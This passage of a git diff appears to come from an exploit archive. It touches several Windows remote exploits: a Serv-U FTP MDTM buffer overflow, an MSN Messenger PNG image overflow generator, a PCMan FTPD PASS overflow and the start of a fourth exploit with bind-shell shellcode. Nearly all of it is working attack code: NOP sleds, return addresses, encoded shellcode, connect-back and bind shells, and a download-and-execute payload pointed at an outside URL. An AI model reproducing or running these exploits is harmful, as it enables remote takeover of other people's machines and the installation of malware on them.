-            printf(\"[-] Invalid url. Must start with \'http://\',\'ftp://\' and <255 bytes.\\n\");
+            printf("[-] Invalid url. Must start with 'http://','ftp://' and <255 bytes.\n");
             return -1;                
         }
     }
     
-    if(strstr(targets[iType].szDescription, \"2.x\"))
+    if(strstr(targets[iType].szDescription, "2.x"))
     {
         b2x = TRUE;
-        printf(\"[*] Attack Target is Serv-U 2.x.\\r\\n\");
+        printf("[*] Attack Target is Serv-U 2.x.\r\n");
     }
     else
     {
-        printf(\"[*] Attack Target is Serv-U 3.x/4.x/5.x.\\r\\n\");
+        printf("[*] Attack Target is Serv-U 3.x/4.x/5.x.\r\n");
     }
     
-    _snprintf(user, sizeof(user)-1, \"USER %s\\r\\n\", pUser);
-    user[sizeof(user)-1]=\'\\0\';
-    _snprintf(pass, sizeof(pass)-1, \"PASS %s\\r\\n\", pPass);
-    pass[sizeof(pass)-1]=\'\\0\';
+    _snprintf(user, sizeof(user)-1, "USER %s\r\n", pUser);
+    user[sizeof(user)-1]='\0';
+    _snprintf(pass, sizeof(pass)-1, "PASS %s\r\n", pPass);
+    pass[sizeof(pass)-1]='\0';
     szSend[0] = user;    //user
     szSend[1] = pass;    //pass    
     szSend[2] = penetrate;    //pentrate
@@ -461,26 +461,26 @@ int main(int argc, char **argv)
         strncpy(cbHost2, cbHost, 20);
         for(i=0;i<strlen(cbHost); i++)
         {
-            if(cbHost[i] == \'.\')
-                cbHost2[i] = \',\';
+            if(cbHost[i] == '.')
+                cbHost2[i] = ',';
         }
         
-        sprintf(penetrate, \"PORT %s,%d,%d\\r\\n\", cbHost2, shport/256, shport%256);
+        sprintf(penetrate, "PORT %s,%d,%d\r\n", cbHost2, shport/256, shport%256);
 
-        //printf(\"%s\", penetrate);
+        //printf("%s", penetrate);
     }
     else
     {
-        sprintf(penetrate,\"TYPE I\\r\\n\");        
+        sprintf(penetrate,"TYPE I\r\n");        
     }
 
-    // fill the \"MDTM\" command
-    strcpy(szCommand, \"MDTM 20031111111111+\");
+    // fill the "MDTM" command
+    strcpy(szCommand, "MDTM 20031111111111+");
 
     // fill the egg
     for(i=0; i<SEH_OFFSET; i++)
     {
-        strcat(szCommand, \"\\x90\");
+        strcat(szCommand, "\x90");
     }
 
     // ret addr
@@ -488,7 +488,7 @@ int main(int argc, char **argv)
     {
 
         // fill the egg
-        if(strstr(targets[iType].szDescription, \"<\"))
+        if(strstr(targets[iType].szDescription, "<"))
         {
             j = 8;
         }
@@ -498,7 +498,7 @@ int main(int argc, char **argv)
         }
         for(i=0; i<j; i++)
         {
-            strcat(szCommand, \"\\x90\");
+            strcat(szCommand, "\x90");
         }
         
         memcpy(&szCommand[strlen(szCommand)], &targets[iType].dwJMP, 4);
@@ -524,12 +524,12 @@ int main(int argc, char **argv)
     }
 
     // fill the space
-    strcat(szCommand, \" \");
+    strcat(szCommand, " ");
 
     // fill the egg
     for(i=0; i<0x10; i++)
     {
-        strcat(szCommand, \"\\x90\");
+        strcat(szCommand, "\x90");
     }
 
     // fill the shellcode start sign
@@ -572,16 +572,16 @@ int main(int argc, char **argv)
     strcat(szCommand, sc_end);
 
     // send end
-    strcat(szCommand, \"\\r\\n\");
+    strcat(szCommand, "\r\n");
 
     if(strlen(szCommand) >= sizeof(szCommand))
     {
-        printf(\"[-] stack buffer overflow.\\n\");
+        printf("[-] stack buffer overflow.\n");
         return -1;
     }
     
-    //printf(\"send size %d:%s\", strlen(szCommand), szCommand);
-    //printf(\"buffsize %d\\r\\n\", strlen(szCommand)-5-2);
+    //printf("send size %d:%s", strlen(szCommand), szCommand);
+    //printf("buffsize %d\r\n", strlen(szCommand)-5-2);
     
 #ifndef UNIX
     __try
@@ -591,14 +591,14 @@ int main(int argc, char **argv)
 #ifndef UNIX
         if (WSAStartup(MAKEWORD(1,1), &wsd) != 0)
         {
-            printf(\"[-] WSAStartup error:%d\\n\", WSAGetLastError());
+            printf("[-] WSAStartup error:%d\n", WSAGetLastError());
             __leave;
         }
 #endif
         s=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
         if(s == INVALID_SOCKET)
         {
-            printf(\"[-] Create socket failed:%d\",GetLastError());
+            printf("[-] Create socket failed:%d",GetLastError());
             __leave;
         }
 
@@ -614,10 +614,10 @@ int main(int argc, char **argv)
         iErr = connect(s,(struct sockaddr *)&sa,sizeof(sa));
         if(iErr == SOCKET_ERROR)
         {
-            printf(\"[-] Connect to %s:%d error:%d\\n\", ip, iPort, GetLastError());
+            printf("[-] Connect to %s:%d error:%d\n", ip, iPort, GetLastError());
             __leave;
         }
-        printf(\"[+] Connect to %s:%d success.\\n\", ip, iPort);
+        printf("[+] Connect to %s:%d success.\n", ip, iPort);
         
         if(bCb)
         {
@@ -642,15 +642,15 @@ int main(int argc, char **argv)
 
             if(bind(s2,(LPSOCKADDR)&server,sizeof(server))==SOCKET_ERROR)
             {
-                printf(\"[-] Bind port on %s:%d error.\\n\", cbHost, shport);
-                printf(\"[-] You must run nc get the shell.\\n\");
+                printf("[-] Bind port on %s:%d error.\n", cbHost, shport);
+                printf("[-] You must run nc get the shell.\n");
                 bLocal = FALSE;
                 //closesocket(s2);
                 //__leave;
             }
             else
             {    
-                printf(\"[+] Bind port on %s:%d success.\\n\", cbHost, shport);
+                printf("[+] Bind port on %s:%d success.\n", cbHost, shport);
                 listen(s2, 1);
             }
         }
@@ -661,58 +661,58 @@ int main(int argc, char **argv)
             iErr = recv(s, szRecvBuff, sizeof(szRecvBuff), 0);
             if(iErr == SOCKET_ERROR)
             {
-                printf(\"[-] Recv buffer error:%d.\\n\", WSAGetLastError());
+                printf("[-] Recv buffer error:%d.\n", WSAGetLastError());
                 __leave;
             }
-            printf(\"[+] Recv: %s\", szRecvBuff);
+            printf("[+] Recv: %s", szRecvBuff);
             
-            if(szRecvBuff[0] == \'5\')
+            if(szRecvBuff[0] == '5')
             {
-                printf(\"[-] Server return a error Message.\\r\\n\");
+                printf("[-] Server return a error Message.\r\n");
                 __leave;
             }
 
             iErr = send(s, szSend[i], strlen(szSend[i]),0);
             if(iErr == SOCKET_ERROR)
             {
-                printf(\"[-] Send buffer error:%d.\\n\", WSAGetLastError());
+                printf("[-] Send buffer error:%d.\n", WSAGetLastError());
                 __leave;
             }
 
             if(i==sizeof(szSend)/sizeof(szSend[0])-1)
-                printf(\"[+] Send shellcode %d bytes.\\n\", iErr);
+                printf("[+] Send shellcode %d bytes.\n", iErr);
             else
-                printf(\"[+] Send: %s\", szSend[i]);
+                printf("[+] Send: %s", szSend[i]);
         }
 
         if(bUrl)
         {
-            printf(\"[+] Target Download the file and exec: %s\\r\\n\", url);
-            printf(\"[+] Success? Maybe!\\r\\n\");
+            printf("[+] Target Download the file and exec: %s\r\n", url);
+            printf("[+] Success? Maybe!\r\n");
         }
         else
         {
-            printf(\"[+] If you don\'t have a shell it didn\'t work.\\n\");
+            printf("[+] If you don't have a shell it didn't work.\n");
 
             if(bCb)
             {
                 if(bLocal)
                 {
-                    printf(\"[+] Wait for shell...\\n\");
+                    printf("[+] Wait for shell...\n");
             
                     len = sizeof(client);
                     s3 = accept(s2, (struct sockaddr*)&client, &len);
                     if(s3 != INVALID_SOCKET)
                     {
-                        printf(\"[+] Exploit success! Good luck! :)\\n\");
-                        printf(\"[+] ===--===--===--===--===--===--===--===--===--===--===--===--===--===\\n\");
+                        printf("[+] Exploit success! Good luck! :)\n");
+                        printf("[+] ===--===--===--===--===--===--===--===--===--===--===--===--===--===\n");
                         shell(s3);
                     }
                 }    
             }
             else
             {
-                printf(\"[+] Connect to shell...\\n\");
+                printf("[+] Connect to shell...\n");
             
                 Sleep(1000);
                 s2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
@@ -723,12 +723,12 @@ int main(int argc, char **argv)
                 ret = connect(s2, (struct sockaddr *)&server, sizeof(server));
                 if(ret!=0)
                 {
-                    printf(\"[-] Exploit seem failed.\\n\");
+                    printf("[-] Exploit seem failed.\n");
                     __leave;
                 }
             
-                printf(\"[+] Exploit success! Good luck! :)\\n\");
-                printf(\"[+] ===--===--===--===--===--===--===--===--===--===--===--===--===--===\\n\");
+                printf("[+] Exploit success! Good luck! :)\n");
+                printf("[+] ===--===--===--===--===--===--===--===--===--===--===--===--===--===\n");
                 shell(s2);
             }
         }    
diff --git a/platforms/windows/remote/25094.c b/platforms/windows/remote/25094.c
index 949f2ff78..35a83d01c 100755
--- a/platforms/windows/remote/25094.c
+++ b/platforms/windows/remote/25094.c
@@ -38,7 +38,7 @@ Since this issue may be exploited in a client-to-client attack for MSN Messenger
 *
 * After creating vuln png image, open
 * MSN Messenger and select it as your display picture in
-* \"Tools->Change Display Picture\".
+* "Tools->Change Display Picture".
 *
 */
 
@@ -55,28 +55,28 @@ Since this issue may be exploited in a client-to-client attack for MSN Messenger
 #define NOP 0x90
 
 char png_header[] =
-\"\\x89\\x50\\x4E\\x47\\x0D\\x0A\\x1A\\x0A\\x00\\x00\\x00\\x0D\\x49\\x48\\x44\\x52\"
-\"\\x00\\x00\\x00\\x40\\x00\\x00\\x00\\x40\\x08\\x03\\x00\\x00\\x00\\x9D\\xB7\\x81\"
-\"\\xEC\\x00\\x00\\x01\\xB9\\x74\\x52\\x4E\\x53\";
+"\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52"
+"\x00\x00\x00\x40\x00\x00\x00\x40\x08\x03\x00\x00\x00\x9D\xB7\x81"
+"\xEC\x00\x00\x01\xB9\x74\x52\x4E\x53";
 
-char pngeof[] = \"\\x90\\x90\\x90\\x59\\xE8\\x47\\xFE\\xFF\\xFF\";
+char pngeof[] = "\x90\x90\x90\x59\xE8\x47\xFE\xFF\xFF";
 
 /* Generic win32 http download shellcode
    xored with 0x1d by delikon (http://delikon.de/) */
-char shellcode[] = \"\\xEB\"
-\"\\x10\\x58\\x31\\xC9\\x66\\x81\\xE9\\x22\\xFF\\x80\\x30\\x1D\\x40\\xE2\\xFA\\xEB\\x05\\xE8\\xEB\\xFF\"
-\"\\xFF\\xFF\\xF4\\xD1\\x1D\\x1D\\x1D\\x42\\xF5\\x4B\\x1D\\x1D\\x1D\\x94\\xDE\\x4D\\x75\\x93\\x53\\x13\"
-\"\\xF1\\xF5\\x7D\\x1D\\x1D\\x1D\\x2C\\xD4\\x7B\\xA4\\x72\\x73\\x4C\\x75\\x68\\x6F\\x71\\x70\\x49\\xE2\"
-\"\\xCD\\x4D\\x75\\x2B\\x07\\x32\\x6D\\xF5\\x5B\\x1D\\x1D\\x1D\\x2C\\xD4\\x4C\\x4C\\x90\\x2A\\x4B\\x90\"
-\"\\x6A\\x15\\x4B\\x4C\\xE2\\xCD\\x4E\\x75\\x85\\xE3\\x97\\x13\\xF5\\x30\\x1D\\x1D\\x1D\\x4C\\x4A\\xE2\"
-\"\\xCD\\x2C\\xD4\\x54\\xFF\\xE3\\x4E\\x75\\x63\\xC5\\xFF\\x6E\\xF5\\x04\\x1D\\x1D\\x1D\\xE2\\xCD\\x48\"
-\"\\x4B\\x79\\xBC\\x2D\\x1D\\x1D\\x1D\\x96\\x5D\\x11\\x96\\x6D\\x01\\xB0\\x96\\x75\\x15\\x94\\xF5\\x43\"
-\"\\x40\\xDE\\x4E\\x48\\x4B\\x4A\\x96\\x71\\x39\\x05\\x96\\x58\\x21\\x96\\x49\\x18\\x65\\x1C\\xF7\\x96\"
-\"\\x57\\x05\\x96\\x47\\x3D\\x1C\\xF6\\xFE\\x28\\x54\\x96\\x29\\x96\\x1C\\xF3\\x2C\\xE2\\xE1\\x2C\\xDD\"
-\"\\xB1\\x25\\xFD\\x69\\x1A\\xDC\\xD2\\x10\\x1C\\xDA\\xF6\\xEF\\x26\\x61\\x39\\x09\\x68\\xFC\\x96\\x47\"
-\"\\x39\\x1C\\xF6\\x7B\\x96\\x11\\x56\\x96\\x47\\x01\\x1C\\xF6\\x96\\x19\\x96\\x1C\\xF5\\xF4\\x1F\\x1D\"
-\"\\x1D\\x1D\\x2C\\xDD\\x94\\xF7\\x42\\x43\\x40\\x46\\xDE\\xF5\\x32\\xE2\\xE2\\xE2\\x70\\x75\\x75\\x33\"
-\"\\x78\\x65\\x78\\x1D\";
+char shellcode[] = "\xEB"
+"\x10\x58\x31\xC9\x66\x81\xE9\x22\xFF\x80\x30\x1D\x40\xE2\xFA\xEB\x05\xE8\xEB\xFF"
+"\xFF\xFF\xF4\xD1\x1D\x1D\x1D\x42\xF5\x4B\x1D\x1D\x1D\x94\xDE\x4D\x75\x93\x53\x13"
+"\xF1\xF5\x7D\x1D\x1D\x1D\x2C\xD4\x7B\xA4\x72\x73\x4C\x75\x68\x6F\x71\x70\x49\xE2"
+"\xCD\x4D\x75\x2B\x07\x32\x6D\xF5\x5B\x1D\x1D\x1D\x2C\xD4\x4C\x4C\x90\x2A\x4B\x90"
+"\x6A\x15\x4B\x4C\xE2\xCD\x4E\x75\x85\xE3\x97\x13\xF5\x30\x1D\x1D\x1D\x4C\x4A\xE2"
+"\xCD\x2C\xD4\x54\xFF\xE3\x4E\x75\x63\xC5\xFF\x6E\xF5\x04\x1D\x1D\x1D\xE2\xCD\x48"
+"\x4B\x79\xBC\x2D\x1D\x1D\x1D\x96\x5D\x11\x96\x6D\x01\xB0\x96\x75\x15\x94\xF5\x43"
+"\x40\xDE\x4E\x48\x4B\x4A\x96\x71\x39\x05\x96\x58\x21\x96\x49\x18\x65\x1C\xF7\x96"
+"\x57\x05\x96\x47\x3D\x1C\xF6\xFE\x28\x54\x96\x29\x96\x1C\xF3\x2C\xE2\xE1\x2C\xDD"
+"\xB1\x25\xFD\x69\x1A\xDC\xD2\x10\x1C\xDA\xF6\xEF\x26\x61\x39\x09\x68\xFC\x96\x47"
+"\x39\x1C\xF6\x7B\x96\x11\x56\x96\x47\x01\x1C\xF6\x96\x19\x96\x1C\xF5\xF4\x1F\x1D"
+"\x1D\x1D\x2C\xDD\x94\xF7\x42\x43\x40\x46\xDE\xF5\x32\xE2\xE2\xE2\x70\x75\x75\x33"
+"\x78\x65\x78\x1D";
 
 FILE           *di;
 int            i = 0;
@@ -102,15 +102,15 @@ void main(int argc, char *argv[])
 
         if (argc < 3)
         {
-                printf(\"MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploit\\n\");
-                printf(\"Bug discoveried by Core Security Technologies  (www.coresecurity.com)\\n\");
-                printf(\"Exploit coded By ATmaCA\\n\");
-                printf(\"Copyright ?2002-2005 AtmacaSoft Inc. All Rights Reserved.\\n\");
-                printf(\"Web: http://www.atmacasoft.com\\n\");
-                printf(\"E-Mail: atmaca@icqmail.com\\n\");
-                printf(\"Credit to kozan and delikon\\n\\n\");
-                printf(\"\\tUsage:exploit <OutputPath> <Url>\\n\");
-                printf(\"\\tExample:exploit vuln.png http://www.atmacasoft.com/exp/msg.exe\\n\");
+                printf("MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploit\n");
+                printf("Bug discoveried by Core Security Technologies  (www.coresecurity.com)\n");
+                printf("Exploit coded By ATmaCA\n");
+                printf("Copyright ?2002-2005 AtmacaSoft Inc. All Rights Reserved.\n");
+                printf("Web: http://www.atmacasoft.com\n");
+                printf("E-Mail: atmaca@icqmail.com\n");
+                printf("Credit to kozan and delikon\n\n");
+                printf("\tUsage:exploit <OutputPath> <Url>\n");
+                printf("\tExample:exploit vuln.png http://www.atmacasoft.com/exp/msg.exe\n");
 
                 return;
         }
@@ -119,9 +119,9 @@ void main(int argc, char *argv[])
         web = argv[2];
 
 
-        if( (di=fopen(argv[1],\"wb\")) == NULL )
+        if( (di=fopen(argv[1],"wb")) == NULL )
         {
-                printf(\"Error opening file!\\n\");
+                printf("Error opening file!\n");
                 return;
         }
         for(i=0;i<sizeof(png_header)-1;i++)
@@ -132,13 +132,13 @@ void main(int argc, char *argv[])
                 fputc(NOP,di);
 
         weblength=(short int)0xff22;
-        pointer=strstr(shellcode,\"\\x22\\xff\");
+        pointer=strstr(shellcode,"\x22\xff");
         weblength-=strlen(web)+1;
         memcpy(pointer,&weblength,2);
         newshellcode = new char[sizeof(shellcode)+strlen(web)+1];
         strcpy(newshellcode,shellcode);
         strcat(newshellcode,Sifrele(web));
-        strcat(newshellcode,\"\\x1d\");
+        strcat(newshellcode,"\x1d");
 
         //shell code
         for(i=0;i<strlen(newshellcode);i++)
@@ -158,7 +158,7 @@ void main(int argc, char *argv[])
         for(i=0;i<sizeof(pngeof)-1;i++)
                 fputc(pngeof[i],di);
 
-        printf(\"Vulnarable png file %s has been generated!\\n\",argv[1]);
+        printf("Vulnarable png file %s has been generated!\n",argv[1]);
 
         fclose(di);
 }
diff --git a/platforms/windows/remote/27277.py b/platforms/windows/remote/27277.py
index 37e4602e0..afc377611 100755
--- a/platforms/windows/remote/27277.py
+++ b/platforms/windows/remote/27277.py
@@ -3,7 +3,7 @@
 
 
 
-\"\"\"
+"""
 PCMAN FTPD 2.07 PASS Command Buffer Overflow
 Author: Ottomatik
 Date: 2013-07-31
@@ -13,46 +13,46 @@ Tested On: Windows 7 SP1 - French;
 Description:
     * The PASS Command is vulnerable to a buffer overflow;
     * Other commads may be vulnerable;
-\"\"\"
+"""
 
 # Modules import;
 
 import socket
 
 def main() :
-    \"\"\"
+    """
     Main function;
-    \"\"\"
-    buf = \"PASS \"
-    buf += \"A\" * 6102 # JUNK
+    """
+    buf = "PASS "
+    buf += "A" * 6102 # JUNK
     # 0x75670253
-    buf += \"\\x53\\x02\\x67\\x75\" # @ CALL ESP Kernel32.dll
-    buf += \"\\x90\" * 40 # NOPs
+    buf += "\x53\x02\x67\x75" # @ CALL ESP Kernel32.dll
+    buf += "\x90" * 40 # NOPs
     
     # ShellCode : msfpayload windows_exec calc.exe, bad chars = 00,0A,0C,0D
 
-    buf +=(\"\\xdd\\xc5\\xd9\\x74\\x24\\xf4\\x5a\\x31\\xc9\\xb8\\xd1\\x96\\xc1\\xcb\\xb1\"
-\"\\x33\\x31\\x42\\x17\\x83\\xc2\\x04\\x03\\x93\\x85\\x23\\x3e\\xef\\x42\\x2a\"
-\"\\xc1\\x0f\\x93\\x4d\\x4b\\xea\\xa2\\x5f\\x2f\\x7f\\x96\\x6f\\x3b\\x2d\\x1b\"
-\"\\x1b\\x69\\xc5\\xa8\\x69\\xa6\\xea\\x19\\xc7\\x90\\xc5\\x9a\\xe9\\x1c\\x89\"
-\"\\x59\\x6b\\xe1\\xd3\\x8d\\x4b\\xd8\\x1c\\xc0\\x8a\\x1d\\x40\\x2b\\xde\\xf6\"
-\"\\x0f\\x9e\\xcf\\x73\\x4d\\x23\\xf1\\x53\\xda\\x1b\\x89\\xd6\\x1c\\xef\\x23\"
-\"\\xd8\\x4c\\x40\\x3f\\x92\\x74\\xea\\x67\\x03\\x85\\x3f\\x74\\x7f\\xcc\\x34\"
-\"\\x4f\\x0b\\xcf\\x9c\\x81\\xf4\\xfe\\xe0\\x4e\\xcb\\xcf\\xec\\x8f\\x0b\\xf7\"
-\"\\x0e\\xfa\\x67\\x04\\xb2\\xfd\\xb3\\x77\\x68\\x8b\\x21\\xdf\\xfb\\x2b\\x82\"
-\"\\xde\\x28\\xad\\x41\\xec\\x85\\xb9\\x0e\\xf0\\x18\\x6d\\x25\\x0c\\x90\\x90\"
-\"\\xea\\x85\\xe2\\xb6\\x2e\\xce\\xb1\\xd7\\x77\\xaa\\x14\\xe7\\x68\\x12\\xc8\"
-\"\\x4d\\xe2\\xb0\\x1d\\xf7\\xa9\\xde\\xe0\\x75\\xd4\\xa7\\xe3\\x85\\xd7\\x87\"
-\"\\x8b\\xb4\\x5c\\x48\\xcb\\x48\\xb7\\x2d\\x23\\x03\\x9a\\x07\\xac\\xca\\x4e\"
-\"\\x1a\\xb1\\xec\\xa4\\x58\\xcc\\x6e\\x4d\\x20\\x2b\\x6e\\x24\\x25\\x77\\x28\"
-\"\\xd4\\x57\\xe8\\xdd\\xda\\xc4\\x09\\xf4\\xb8\\x8b\\x99\\x94\\x10\\x2e\\x1a\"
-\"\\x3e\\x6d\")
-    buf += \"\\r\\n\"
+    buf +=("\xdd\xc5\xd9\x74\x24\xf4\x5a\x31\xc9\xb8\xd1\x96\xc1\xcb\xb1"
+"\x33\x31\x42\x17\x83\xc2\x04\x03\x93\x85\x23\x3e\xef\x42\x2a"
+"\xc1\x0f\x93\x4d\x4b\xea\xa2\x5f\x2f\x7f\x96\x6f\x3b\x2d\x1b"
+"\x1b\x69\xc5\xa8\x69\xa6\xea\x19\xc7\x90\xc5\x9a\xe9\x1c\x89"
+"\x59\x6b\xe1\xd3\x8d\x4b\xd8\x1c\xc0\x8a\x1d\x40\x2b\xde\xf6"
+"\x0f\x9e\xcf\x73\x4d\x23\xf1\x53\xda\x1b\x89\xd6\x1c\xef\x23"
+"\xd8\x4c\x40\x3f\x92\x74\xea\x67\x03\x85\x3f\x74\x7f\xcc\x34"
+"\x4f\x0b\xcf\x9c\x81\xf4\xfe\xe0\x4e\xcb\xcf\xec\x8f\x0b\xf7"
+"\x0e\xfa\x67\x04\xb2\xfd\xb3\x77\x68\x8b\x21\xdf\xfb\x2b\x82"
+"\xde\x28\xad\x41\xec\x85\xb9\x0e\xf0\x18\x6d\x25\x0c\x90\x90"
+"\xea\x85\xe2\xb6\x2e\xce\xb1\xd7\x77\xaa\x14\xe7\x68\x12\xc8"
+"\x4d\xe2\xb0\x1d\xf7\xa9\xde\xe0\x75\xd4\xa7\xe3\x85\xd7\x87"
+"\x8b\xb4\x5c\x48\xcb\x48\xb7\x2d\x23\x03\x9a\x07\xac\xca\x4e"
+"\x1a\xb1\xec\xa4\x58\xcc\x6e\x4d\x20\x2b\x6e\x24\x25\x77\x28"
+"\xd4\x57\xe8\xdd\xda\xc4\x09\xf4\xb8\x8b\x99\x94\x10\x2e\x1a"
+"\x3e\x6d")
+    buf += "\r\n"
     
     clt_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-    clt_socket.connect((\"127.0.0.1\", 21))
+    clt_socket.connect(("127.0.0.1", 21))
     print clt_socket.recv(2048)
-    clt_socket.send(\"USER anonymous\\r\\n\")
+    clt_socket.send("USER anonymous\r\n")
     print clt_socket.recv(2048)
     clt_socket.send(buf)
     print clt_socket.recv(2048)
@@ -60,5 +60,5 @@ def main() :
     
 
 
-if __name__ == \"__main__\" :
+if __name__ == "__main__" :
     main()
diff --git a/platforms/windows/remote/27703.py b/platforms/windows/remote/27703.py
index 03a7fd67b..55bf4813c 100755
--- a/platforms/windows/remote/27703.py
+++ b/platforms/windows/remote/27703.py
@@ -14,70 +14,70 @@
 import socket, sys, os, time
 
 if len(sys.argv) != 3:
-        print \"[*] Uso: %s <Ip Victima> <Puerto> \\n\" % sys.argv[0]
-        print \"[*] Exploit created by Polunchis\"
-        print \"[*] https://www.intrusionlabs.org\"
+        print "[*] Uso: %s <Ip Victima> <Puerto> \n" % sys.argv[0]
+        print "[*] Exploit created by Polunchis"
+        print "[*] https://www.intrusionlabs.org"
         sys.exit(0)
 target = sys.argv[1]
 port = int(sys.argv[2])
 
-#msfpayload windows/shell_bind_tcp LPORT=28876 R | msfencode -a x86 -b \'\\x00\\xff\\x0a\\x0d\\x20\\x40\' -t c
+#msfpayload windows/shell_bind_tcp LPORT=28876 R | msfencode -a x86 -b '\x00\xff\x0a\x0d\x20\x40' -t c
 shellcode = (
-\"\\xda\\xcf\\xb8\\xba\\xb3\\x1e\\xe7\\xd9\\x74\\x24\\xf4\\x5a\\x33\\xc9\\xb1\"
-\"\\x56\\x31\\x42\\x18\\x83\\xc2\\x04\\x03\\x42\\xae\\x51\\xeb\\x1b\\x26\\x1c\"
-\"\\x14\\xe4\\xb6\\x7f\\x9c\\x01\\x87\\xad\\xfa\\x42\\xb5\\x61\\x88\\x07\\x35\"
-\"\\x09\\xdc\\xb3\\xce\\x7f\\xc9\\xb4\\x67\\x35\\x2f\\xfa\\x78\\xfb\\xef\\x50\"
-\"\\xba\\x9d\\x93\\xaa\\xee\\x7d\\xad\\x64\\xe3\\x7c\\xea\\x99\\x0b\\x2c\\xa3\"
-\"\\xd6\\xb9\\xc1\\xc0\\xab\\x01\\xe3\\x06\\xa0\\x39\\x9b\\x23\\x77\\xcd\\x11\"
-\"\\x2d\\xa8\\x7d\\x2d\\x65\\x50\\xf6\\x69\\x56\\x61\\xdb\\x69\\xaa\\x28\\x50\"
-\"\\x59\\x58\\xab\\xb0\\x93\\xa1\\x9d\\xfc\\x78\\x9c\\x11\\xf1\\x81\\xd8\\x96\"
-\"\\xe9\\xf7\\x12\\xe5\\x94\\x0f\\xe1\\x97\\x42\\x85\\xf4\\x30\\x01\\x3d\\xdd\"
-\"\\xc1\\xc6\\xd8\\x96\\xce\\xa3\\xaf\\xf1\\xd2\\x32\\x63\\x8a\\xef\\xbf\\x82\"
-\"\\x5d\\x66\\xfb\\xa0\\x79\\x22\\x58\\xc8\\xd8\\x8e\\x0f\\xf5\\x3b\\x76\\xf0\"
-\"\\x53\\x37\\x95\\xe5\\xe2\\x1a\\xf2\\xca\\xd8\\xa4\\x02\\x44\\x6a\\xd6\\x30\"
-\"\\xcb\\xc0\\x70\\x79\\x84\\xce\\x87\\x7e\\xbf\\xb7\\x18\\x81\\x3f\\xc8\\x31\"
-\"\\x46\\x6b\\x98\\x29\\x6f\\x13\\x73\\xaa\\x90\\xc6\\xd4\\xfa\\x3e\\xb8\\x94\"
-\"\\xaa\\xfe\\x68\\x7d\\xa1\\xf0\\x57\\x9d\\xca\\xda\\xee\\x99\\x04\\x3e\\xa3\"
-\"\\x4d\\x65\\xc0\\x33\\x42\\xe0\\x26\\xd9\\x4a\\xa5\\xf1\\x75\\xa9\\x92\\xc9\"
-\"\\xe2\\xd2\\xf0\\x65\\xbb\\x44\\x4c\\x60\\x7b\\x6a\\x4d\\xa6\\x28\\xc7\\xe5\"
-\"\\x21\\xba\\x0b\\x32\\x53\\xbd\\x01\\x12\\x1a\\x86\\xc2\\xe8\\x72\\x45\\x72\"
-\"\\xec\\x5e\\x3d\\x17\\x7f\\x05\\xbd\\x5e\\x9c\\x92\\xea\\x37\\x52\\xeb\\x7e\"
-\"\\xaa\\xcd\\x45\\x9c\\x37\\x8b\\xae\\x24\\xec\\x68\\x30\\xa5\\x61\\xd4\\x16\"
-\"\\xb5\\xbf\\xd5\\x12\\xe1\\x6f\\x80\\xcc\\x5f\\xd6\\x7a\\xbf\\x09\\x80\\xd1\"
-\"\\x69\\xdd\\x55\\x1a\\xaa\\x9b\\x59\\x77\\x5c\\x43\\xeb\\x2e\\x19\\x7c\\xc4\"
-\"\\xa6\\xad\\x05\\x38\\x57\\x51\\xdc\\xf8\\x67\\x18\\x7c\\xa8\\xef\\xc5\\x15\"
-\"\\xe8\\x6d\\xf6\\xc0\\x2f\\x88\\x75\\xe0\\xcf\\x6f\\x65\\x81\\xca\\x34\\x21\"
-\"\\x7a\\xa7\\x25\\xc4\\x7c\\x14\\x45\\xcd\"
+"\xda\xcf\xb8\xba\xb3\x1e\xe7\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
+"\x56\x31\x42\x18\x83\xc2\x04\x03\x42\xae\x51\xeb\x1b\x26\x1c"
+"\x14\xe4\xb6\x7f\x9c\x01\x87\xad\xfa\x42\xb5\x61\x88\x07\x35"
+"\x09\xdc\xb3\xce\x7f\xc9\xb4\x67\x35\x2f\xfa\x78\xfb\xef\x50"
+"\xba\x9d\x93\xaa\xee\x7d\xad\x64\xe3\x7c\xea\x99\x0b\x2c\xa3"
+"\xd6\xb9\xc1\xc0\xab\x01\xe3\x06\xa0\x39\x9b\x23\x77\xcd\x11"
+"\x2d\xa8\x7d\x2d\x65\x50\xf6\x69\x56\x61\xdb\x69\xaa\x28\x50"
+"\x59\x58\xab\xb0\x93\xa1\x9d\xfc\x78\x9c\x11\xf1\x81\xd8\x96"
+"\xe9\xf7\x12\xe5\x94\x0f\xe1\x97\x42\x85\xf4\x30\x01\x3d\xdd"
+"\xc1\xc6\xd8\x96\xce\xa3\xaf\xf1\xd2\x32\x63\x8a\xef\xbf\x82"
+"\x5d\x66\xfb\xa0\x79\x22\x58\xc8\xd8\x8e\x0f\xf5\x3b\x76\xf0"
+"\x53\x37\x95\xe5\xe2\x1a\xf2\xca\xd8\xa4\x02\x44\x6a\xd6\x30"
+"\xcb\xc0\x70\x79\x84\xce\x87\x7e\xbf\xb7\x18\x81\x3f\xc8\x31"
+"\x46\x6b\x98\x29\x6f\x13\x73\xaa\x90\xc6\xd4\xfa\x3e\xb8\x94"
+"\xaa\xfe\x68\x7d\xa1\xf0\x57\x9d\xca\xda\xee\x99\x04\x3e\xa3"
+"\x4d\x65\xc0\x33\x42\xe0\x26\xd9\x4a\xa5\xf1\x75\xa9\x92\xc9"
+"\xe2\xd2\xf0\x65\xbb\x44\x4c\x60\x7b\x6a\x4d\xa6\x28\xc7\xe5"
+"\x21\xba\x0b\x32\x53\xbd\x01\x12\x1a\x86\xc2\xe8\x72\x45\x72"
+"\xec\x5e\x3d\x17\x7f\x05\xbd\x5e\x9c\x92\xea\x37\x52\xeb\x7e"
+"\xaa\xcd\x45\x9c\x37\x8b\xae\x24\xec\x68\x30\xa5\x61\xd4\x16"
+"\xb5\xbf\xd5\x12\xe1\x6f\x80\xcc\x5f\xd6\x7a\xbf\x09\x80\xd1"
+"\x69\xdd\x55\x1a\xaa\x9b\x59\x77\x5c\x43\xeb\x2e\x19\x7c\xc4"
+"\xa6\xad\x05\x38\x57\x51\xdc\xf8\x67\x18\x7c\xa8\xef\xc5\x15"
+"\xe8\x6d\xf6\xc0\x2f\x88\x75\xe0\xcf\x6f\x65\x81\xca\x34\x21"
+"\x7a\xa7\x25\xc4\x7c\x14\x45\xcd"
 )
 
